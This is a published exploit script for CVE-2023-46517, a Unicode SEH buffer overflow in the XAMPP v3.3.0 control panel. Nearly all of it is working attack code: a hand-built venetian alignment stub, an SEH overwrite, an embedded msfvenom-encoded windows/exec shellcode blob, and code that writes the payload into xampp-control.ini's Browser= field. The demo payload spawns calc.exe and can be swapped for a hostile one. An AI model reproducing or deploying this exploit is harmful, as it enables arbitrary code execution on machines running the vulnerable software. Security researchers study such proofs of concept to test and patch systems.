# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
# Date: 2023-10-26
# Author: Talson (@Ripp3rdoc)
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
# Version: 3.3.0
# Tested on: Windows 11
# CVE-2023-46517
##########################################################
# _________ _______ _ _______ _______ _ #
# \__ __/( ___ )( \ ( ____ \( ___ )( ( /| #
# ) ( | ( ) || ( | ( \/| ( ) || \ ( | #
# | | | (___) || | | (_____ | | | || \ | | #
# | | | ___ || | (_____ )| | | || (\ \) | #
# | | | ( ) || | ) || | | || | \ | #
# | | | ) ( || (____/\/\____) || (___) || ) \ | #
# )_( |/ \|(_______/\_______)(_______)|/ )_) #
# #
##########################################################
# Proof of Concept:
# 1.- Run the python script "poc.py": it writes the malicious config to c:\xampp\xampp-control.ini, replacing any existing one (the script attempts a .bak copy of the original first).
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit: the embedded windows/exec payload (see the msfvenom command below) spawns calc.exe.
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
# Greetingz to EMU TEAM (¬‿¬)⩙
from pwn import *
import shutil
import os.path
# ---------------------------------------------------------------------------
# Payload assembly.
#
# Layout of the Browser= value, left to right:
#   [filler 268] [nSEH 2] [SEH 2] [alignment stub 16] [pad 85] [msfvenom decoder]
#
# Everything is a str of single code points.  Per the title and the
# x86/unicode_mixed encoder choice, the target is expected to widen each byte
# to a UTF-16 unit, so every instruction below is spelled "venetian" style and
# 0x71 bytes are used as alignment padding.  Nothing from pwntools is used in
# this section; plain str operations suffice.
# ---------------------------------------------------------------------------
SEH_OFFSET = 268  # bytes of filler before the SEH record is overwritten

filler = "A" * SEH_OFFSET          # 0x41 x 268
next_seh = "Yq"                    # 0x00590071 after widening: inert padding
seh_handler = "\x15C"              # 0x00430015: pop ecx ; pop ebp ; ret

# Alignment stub: derive a pointer to the decoder in EAX and jump to it.
# The concrete EAX values are the author's debugger observations.
alignment_stub = "".join([
    "\x47",           # venetian pad/align
    "\x51",           # push ecx
    "\x71",           # venetian pad/align
    "\x58",           # pop eax              (author: eax = 0x0019e1a0)
    "\x71",           # venetian pad/align
    "\x05\x24\x11",   # add eax, 0x11002300
    "\x71",           # venetian pad/align
    "\x2d\x11\x11",   # sub eax, 0x11001100  (author: eax = 0x0019F3DC)
    "\x71",           # venetian pad/align
    "\x50",           # push eax
    "\x71",           # pad so the following ret lands on the widened byte
    "\xc3",           # ret -> continue at the address in EAX (the decoder)
])
alignment_pad = "\x71" * 0x55      # 85 padding bytes between the stub and the decoder

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
# Payload size: 512 bytes
decoder = (
    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
    "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
    "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
    "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
    "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
    "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
)

# Final value written into Browser= by the section below.
shellcode = "".join((filler, next_seh, seh_handler, alignment_stub, alignment_pad, decoder))
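INI_PATH = "c:\\xampp\\xampp-control.ini"
BACKUP_PATH = INI_PATH + ".bak"


def ensure_backup(src: str, dst: str) -> bool:
    """Keep one pristine copy of the control-panel config before it is overwritten.

    Args:
        src: path of the live xampp-control.ini.
        dst: path of the backup copy.

    Returns:
        True when it is safe to proceed (a backup already exists, was just
        created, or there was no source file to preserve); False when the
        copy was attempted and failed.

    The original script tested for the *.ini* instead of the *.bak* file, so
    it skipped the copy exactly when there was something to back up and only
    attempted it (and failed) when the source was missing.
    """
    if os.path.isfile(dst):
        # An earlier run already saved the original; never clobber it.
        print("[!] Backup file found. Generating the POC file...")
        return True
    if not os.path.isfile(src):
        print("[!] No existing xampp-control.ini to back up; continuing.")
        return True
    print("[+] Creating backup for xampp-control.ini...")
    try:
        shutil.copyfile(src, dst)
    except OSError as e:  # permission denied, locked file, missing directory, ...
        print("[!] Failed creating a backup for xampp-control.ini: ", e)
        return False
    print("[+] Backup file created!")
    return True


if not ensure_backup(INI_PATH, BACKUP_PATH):
    # Without a backup the only copy of the user's configuration would be
    # destroyed by the overwrite that follows, so stop here instead.
    raise SystemExit("[!] Aborting: could not back up xampp-control.ini.")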
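# Write the weaponised control-panel config.  The template is the stock
# xampp-control.ini layout with only the Browser= value replaced by the
# payload; the PoC steps in the header indicate the control panel consumes it
# when the "Admin" button is pressed.
#
# NOTE(review): the file is written as UTF-8.  Every code point in `shellcode`
# is ASCII except the 0xC3 `ret` at the end of the alignment stub, which UTF-8
# serialises as the two bytes C3 83.  The PoC was published as tested in this
# form; how xampp-control.exe decodes the file is not visible here, so confirm
# the bytes the target actually executes before changing the encoding.
#
# NOTE(review): `FileZill=14147` under [ServicePorts] is reproduced verbatim
# from the original PoC.  It looks like a truncated key name, but it is data
# the target parses, so it is left untouched.
try:
    with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as ini:
        ini.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}
Debug=0
Debuglevel=0
Language=en
TomcatVisible=1
Minimized=0
[LogSettings]
Font=Arial
FontSize=10
[WindowSettings]
Left=-1
Top=-1
Width=682
Height=441
[Autostart]
Apache=0
MySQL=0
FileZilla=0
Mercury=0
Tomcat=0
[Checks]
CheckRuntimes=1
CheckDefaultPorts=1
[ModuleNames]
Apache=Apache
MySQL=MySQL
Mercury=Mercury
Tomcat=Tomcat
[EnableModules]
Apache=1
MySQL=1
FileZilla=1
Mercury=1
Tomcat=1
[EnableServices]
Apache=1
MySQL=1
FileZilla=1
Tomcat=1
[BinaryNames]
Apache=httpd.exe
MySQL=mysqld.exe
FileZilla=filezillaserver.exe
FileZillaAdmin=filezilla server interface.exe
Mercury=mercury.exe
Tomcat=tomcat8.exe
[ServiceNames]
Apache=Apache2.4
MySQL=mysql
FileZilla=FileZillaServer
Tomcat=Tomcat
[ServicePorts]
Apache=80
ApacheSSL=443
MySQL=3306
FileZilla=21
FileZill=14147
Mercury1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
Mercury6=143
Mercury7=2224
TomcatHTTP=8080
TomcatAJP=8009
Tomcat=8005
[UserConfigs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
[UserLogs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
""")
except OSError as e:
    # Only file-system failures belong here.  The original caught Exception,
    # which would also swallow e.g. a NameError from the payload assembly and
    # misreport it as a write failure.
    print("[!] Failed creating the POC xampp-control.ini: ", e)
else:
    print("[+] Created the POC!")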